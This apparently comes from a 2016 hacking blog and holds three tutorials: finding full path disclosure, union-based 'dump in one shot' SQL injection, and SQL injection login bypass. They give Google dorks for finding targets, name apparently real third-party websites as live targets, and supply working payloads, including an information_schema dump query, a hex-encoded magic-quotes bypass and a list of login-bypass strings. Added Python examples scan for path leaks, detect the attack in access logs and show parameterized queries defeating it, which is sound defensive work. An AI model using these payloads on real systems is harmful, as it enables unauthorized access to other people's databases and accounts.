Saturday, April 16, 2016

Getting Full Path Disclosure (FPD)

!! FOR EDUCATIONAL PURPOSES ONLY !!
I Introduction
Today I'm gonna teach you how to get the full path disclosure, also known as FPD.

II Learning Basics
What is FPD?
FPD, or Full Path Disclosure, is when the site reveals the internal path structure of its installation.
Example:
/home/www/htdocs/

Why do attackers need FPD sometimes?
Attackers need it because they need the full path to deploy their backdoor shell.
It is very much needed for uploading a shell through SQL injection with INTO OUTFILE.
Example: you visit the URL www.website.com/index.php
in the internal path, it's /home/www/htdocs/index.php

III Getting Full Path Disclosure
1) Using errors
In SQL injection, you can already get the FPD if error_reporting is enabled.
http://jornaldacidadearuja.com.br/guia/det.php?id=19'
If you see the error
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/jornaldacidade/public_html/site/include/mysql.inc.php on line 142
you already got the FPD. Ez.

2) Using an empty array
Example, this is the page
www.website.com/page=about
Let's make the variable page an empty array
www.website.com/page[]=about
After doing it, you'll see an error if error_reporting is enabled, such as:
Warning: opendir(Array): failed to open dir: No such file or directory in /home/omg/htdocs/index.php on line 84
Warning: pg_num_rows(): supplied argument … in /usr/home/example/html/pie/index.php on line 131

3) Google dorks
You can use Google dorks to find the FPD of a website,
example dork:
Warning: * [function.*]: site:www.website.com

Or you can use this dork:
ip:xxx.xxx.xxx.xx * [function.*]:

You can make your own dork if you want.
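The same error lines an attacker hunts for are exactly what a site owner should be grepping their own responses for. Here is an added example (not from the original post) that scans constructed HTTP response bodies for PHP warnings that leak an absolute script path, so the pages that disclose paths can be found and display_errors turned off; the URLs and paths in SAMPLE_RESPONSES are made up for the example.

```python
import re
from os.path import dirname

# Sample HTTP response bodies, constructed for this example (not real sites).
SAMPLE_RESPONSES = {
    "/guia/det.php?id=19'": (
        "<b>Warning</b>: mysql_fetch_array() expects parameter 1 to be resource, "
        "boolean given in <b>/var/www/example/site/include/mysql.inc.php</b> "
        "on line <b>142</b><br/>\n<html><body>Guia</body></html>"
    ),
    "/index.php?page[]=about": (
        "Warning: opendir(Array): failed to open dir: No such file or directory "
        "in /var/www/example/index.php on line 84\n"
        "Warning: include(): Filename cannot be empty in /var/www/example/index.php on line 90\n"
    ),
    "/index.php?page=about": "<html><body>About us</body></html>",
}

# A PHP error line leaks the absolute script path: "... in /abs/path.php on line N".
# With html_errors=On the path is wrapped in <b> tags, so strip tags before matching.
TAG_RE = re.compile(r"<[^>]+>")
FPD_RE = re.compile(
    r"\b(?:Warning|Notice|Fatal error|Parse error|Deprecated)\b.*?"
    r"\bin\s+(?P<path>/[^\s<>\"']+?\.(?:php|inc|phtml))\s+on\s+line\s+(?P<line>\d+)",
    re.IGNORECASE | re.DOTALL,
)

def find_path_disclosures(body):
    """Return (script_path, line_number) for every PHP error leaked in a response body."""
    text = TAG_RE.sub("", body)
    return [(m.group("path"), int(m.group("line"))) for m in FPD_RE.finditer(text)]

def scan_responses(responses):
    """Map each URL to the absolute paths it leaks; URLs with no leak are omitted."""
    report = {}
    for url, body in responses.items():
        leaks = find_path_disclosures(body)
        if leaks:
            report[url] = leaks
    return report

def leaked_webroots(report):
    """Directories disclosed across all leaks: what the attacker learns, what ops must hide."""
    return sorted({dirname(path) for leaks in report.values() for path, _ in leaks})

if __name__ == "__main__":
    found = scan_responses(SAMPLE_RESPONSES)
    print(found)
    print("disclosed directories:", leaked_webroots(found))
```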

IV Goodbye
So that's all for now, hope you enjoyed my post. If you have any questions or feedback, please feel free to say so in the comments!

Union Based DIOS (Dump In One Shot) SQL Injection

!! FOR EDUCATION PURPOSES ONLY !!

I Introduction
Hey guys! Today I'm gonna teach you how to do DIOS in union-based SQL injection.

II Learning Basics
So here we go again, you need to learn the basics. Of course you already know it, I just want to repeat lol.

1) Google dorks
What are Google dorks?
Google dorks are search operators like "inurl" and "intext" that make searching easier.

Why do we need that?
No, we really don't need that. Just kidding, of course we need that to get target websites!

How do we use it?
For example, go to Google and search: " inurl:news.php?id= "
you'll see results like www.website.com/news.php?id=5

II Finding target
Google: " inurl:news.php?id= "
You can make your own Google dork if you want; the common dorks are

inurl:page.php?id=19
inurl:gallery.php?id=19
inurl:view.php?id=19
inurl:article.php?id=19
inurl:buy.php?id=19

So get some targets and let's start.

III Checking if vulnerable to SQL Injection

After getting a website target, we will now check if it's vulnerable to SQL injection or not.
Example, this is my target: http://jornaldacidadearuja.com.br/guia/det.php?id=19

You'll add a single quote " ' " to the end of the number
http://jornaldacidadearuja.com.br/guia/det.php?id=19'

Now, if you see an error message or the page doesn't look normal, then there's a chance that it's vulnerable to SQL injection,
but if the page loads normally, too bad. It's not vulnerable.

What to do if it's not vulnerable?
Of course, find another website xD

IV Counting vulnerable columns
After you find it vulnerable to SQL injection, it's time to count the columns using ORDER BY.
http://jornaldacidadearuja.com.br/guia/det.php?id=19 order by 1--
Increase the number 1 until you get an error.

http://jornaldacidadearuja.com.br/guia/det.php?id=19 order by 1-- ("No error")
http://jornaldacidadearuja.com.br/guia/det.php?id=19 order by 2-- ("No error")
http://jornaldacidadearuja.com.br/guia/det.php?id=19 order by 10-- ("No error?!")
http://jornaldacidadearuja.com.br/guia/det.php?id=19 order by 100000-- ("No error?!!")

So if that happens, you got to 99999 and still no error,
that means the ID is a string, not an integer.

So how do we fix it?
Simply add " ' " after the number and add " + " at the end.
http://jornaldacidadearuja.com.br/guia/det.php?id=19' order by 1--+

Start:
http://jornaldacidadearuja.com.br/guia/det.php?id=19' order by 10--+ ("no error")
http://jornaldacidadearuja.com.br/guia/det.php?id=19' order by 20--+ ("ERROR")
http://jornaldacidadearuja.com.br/guia/det.php?id=19' order by 15--+ ("no error")
http://jornaldacidadearuja.com.br/guia/det.php?id=19' order by 16--+ ("no error")
http://jornaldacidadearuja.com.br/guia/det.php?id=19' order by 17--+ ("no error")
http://jornaldacidadearuja.com.br/guia/det.php?id=19' order by 18--+ ("no error")
http://jornaldacidadearuja.com.br/guia/det.php?id=19' order by 19--+ ("Error!!!!")

There we go! We know that there are 18 columns. Now we will check which column is injectable!

V Getting injectable column
Now that we know there are 18 columns, we will get the injectable column.
Our payload will be " and false union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 "
so the URL will be http://jornaldacidadearuja.com.br/guia/det.php?id=19' and false union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--+
Heyy! Column 6 is the injectable column.

VI DIOS ( Dump In One Shot )
Our payload for Dump In One Shot is (select (@a) from (select(@a:=0x00),(@tbl:=0x00),(select (@a) from (information_schema.columns) where (table_schema!='information_schema') and(0x00)in (@a:=concat(@a,0x3c62723e,if( (@tbl!=table_name), Concat(0x3c62723e,table_schema,' :: ',@tbl:=table_name,' ',column_name), (column_name))))))a)
And voilà! Dumped in one shot!

VII Magic Quotes enabled
If it didn't work for you, then let's say magic quotes is enabled.
What are magic quotes?
Magic quotes replace " ' " with " \' ".
How to bypass it?
It's easy. Just hex-encode those string literals. The payload will be
(select(@a) from (select(@a:=0x00),(@tbl:=0x00),(select (@a) from (information_schema.columns) where (table_schema!=0x696e666f726d6174696f6e5f736368656d61) and(0x00)in (@a:=concat(@a,0x3c62723e,if( (@tbl!=table_name), Concat(0x3c62723e,table_schema,0x203a3a20,@tbl:=table_name,0x20,column_name), (column_name))))))a)

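Every step of the procedure above, from the single quote through ORDER BY counting, the UNION SELECT, information_schema, the @a:= variables and the hex-encoded strings, leaves a distinctive trail in the web server's access log. As an added example (not part of the original post), here is a small Python detector run over a constructed Apache-style log; the IPs, timestamps and URLs in SAMPLE_LOG are made up, and the rule names are my own.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed Apache-style access log, not taken from any real server.
SAMPLE_LOG = """\
203.0.113.7 - - [16/Apr/2016:10:01:02 +0000] "GET /guia/det.php?id=19 HTTP/1.1" 200 5120
203.0.113.7 - - [16/Apr/2016:10:01:09 +0000] "GET /guia/det.php?id=19' HTTP/1.1" 500 812
203.0.113.7 - - [16/Apr/2016:10:01:20 +0000] "GET /guia/det.php?id=19'%20order%20by%2018--+ HTTP/1.1" 200 5120
203.0.113.7 - - [16/Apr/2016:10:01:25 +0000] "GET /guia/det.php?id=19'%20order%20by%2019--+ HTTP/1.1" 500 812
203.0.113.7 - - [16/Apr/2016:10:02:01 +0000] "GET /guia/det.php?id=19'%20and%20false%20union%20select%201,2,3,4,5,6--+ HTTP/1.1" 200 4300
203.0.113.7 - - [16/Apr/2016:10:02:40 +0000] "GET /guia/det.php?id=19'%20union%20select%201,(select(@a)from(select(@a:=0x00),(select(@a)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)))a),3--+ HTTP/1.1" 200 9900
198.51.100.3 - - [16/Apr/2016:10:03:00 +0000] "GET /guia/det.php?id=21 HTTP/1.1" 200 5080
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<url>\S+) [^"]*" (?P<status>\d{3})')

# One rule per step of the procedure above; they run on the URL-decoded query string.
RULES = {
    "quote_probe": re.compile(r"=[^&'=]*'(?:\s|$|-)"),                 # id=19'
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),          # column counting
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "information_schema": re.compile(r"\binformation_schema\b", re.I),
    "user_variable": re.compile(r"@\w+\s*:="),                          # @a:= in the DIOS payload
    "hex_literal": re.compile(r"\b0x[0-9a-f]{6,}\b", re.I),              # hex-encoded strings (magic_quotes bypass)
    "comment_terminator": re.compile(r"--\+|--\s*$|#$"),
}

def classify(url):
    """Return the sorted rule names that match the decoded query string of a URL."""
    query = unquote(url.partition("?")[2])
    return sorted(name for name, rx in RULES.items() if rx.search(query))

def analyze_log(text):
    """Return (ip, url, status, tags) for every request that triggers at least one rule."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        tags = classify(m.group("url"))
        if tags:
            findings.append((m.group("ip"), m.group("url"), int(m.group("status")), tags))
    return findings

def suspicious_ips(findings, threshold=3):
    """Clients with at least `threshold` flagged requests: a probing sequence, not a stray quote."""
    counts = Counter(f[0] for f in findings)
    return sorted(ip for ip, n in counts.items() if n >= threshold)
```

The threshold separates a user who happened to type an apostrophe from the escalating sequence the tutorial walks through; on a real log, feed each line to analyze_log as it arrives and alert on suspicious_ips.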
VIII Goodbye
So I hope you learned something in this tutorial. If you have any questions or feedback, please feel free to comment!

SQL Injection Login Bypass

!! FOR EDUCATION PURPOSES ONLY !!
I Introduction
Today I'm gonna teach you how to bypass a login panel using SQL injection.

II Learning Basics
1) Google dorks
What are Google dorks? Google dorks are search operators like "inurl" and "intext" that make searching easier.

Why do we need that?
No, we really don't need that. Just kidding, of course we need that to get target websites!

How do we use it?
For example, go to Google and search: " inurl:login.php "
you'll see results like www.website.com/login.php

2) SQL
Structured Query Language (SQL) is a special-purpose programming language designed for managing data held in a relational database management system.
Reference? Of course, Wikipedia.

3) SQL injection
SQL injection is a kind of attack where malicious input is inserted into SQL statements to drop, update, add, view, etc. a database.

III Finding target
After learning some basics, we will now get a target using Google dorks.
Examples of Google dorks:
inurl:login.php
inurl:admin.php
inurl:administrator.php
inurl:admin_login.php

IV Bypass Login
So after finding a target, we will now try to bypass it.
Example, this is our target
http://www.voteforgoodleader.com/h/launch.php?m=home&sm=acc&l=en
Try logging in using " a' or '1'='1 " (without the double quotes) for both password and email.
And bam! We successfully bypassed the login!

Why?
Example, this is the query

select username,pass from users where username='a' or '1'='1' and password='a' or '1'='1' limit 0,1;

The or '1'='1' makes the WHERE clause true no matter what the real username and password are, so the first row is returned.

V Extras
If " a' or '1'='1 " didn't work, you can try some of these:
a' or true--
a' or 1=1--
a') or true--
a' or 1=1#
a) or ('')=('
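To see why the quote trick works and why it stops working once the input is bound as a parameter, here is an added example (not from the original post) that builds the tutorial's query both ways against an in-memory SQLite table. The users table, the "admin" account and the column name pass are assumptions for the example; SQLite accepts the same quote, or and -- syntax as MySQL here, but the # comment form from the list above is MySQL-only.

```python
import sqlite3

def make_db():
    """In-memory users table with one constructed account (example data only)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, pass TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct-horse')")
    return conn

def vulnerable_query(username, password):
    """The tutorial's query, built the way a vulnerable login does it: string concatenation."""
    return ("select username,pass from users where username='%s' and pass='%s' limit 0,1"
            % (username, password))

def login_vulnerable(conn, username, password):
    """True when the concatenated query returns a row, i.e. the 'login' succeeds."""
    return conn.execute(vulnerable_query(username, password)).fetchone() is not None

def login_parameterized(conn, username, password):
    """Same query with bound parameters: a quote in the input is only data, never SQL."""
    sql = "select username,pass from users where username=? and pass=? limit 0,1"
    return conn.execute(sql, (username, password)).fetchone() is not None

BYPASS = "a' or '1'='1"   # the tutorial's payload, typed into both fields

if __name__ == "__main__":
    db = make_db()
    print(vulnerable_query(BYPASS, BYPASS))
    print("vulnerable login bypassed:", login_vulnerable(db, BYPASS, BYPASS))
    print("parameterized login bypassed:", login_parameterized(db, BYPASS, BYPASS))
```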

VI Goodbye
That's all for now, hope you enjoyed my tutorial! If you have any feedback or questions, please feel free to comment.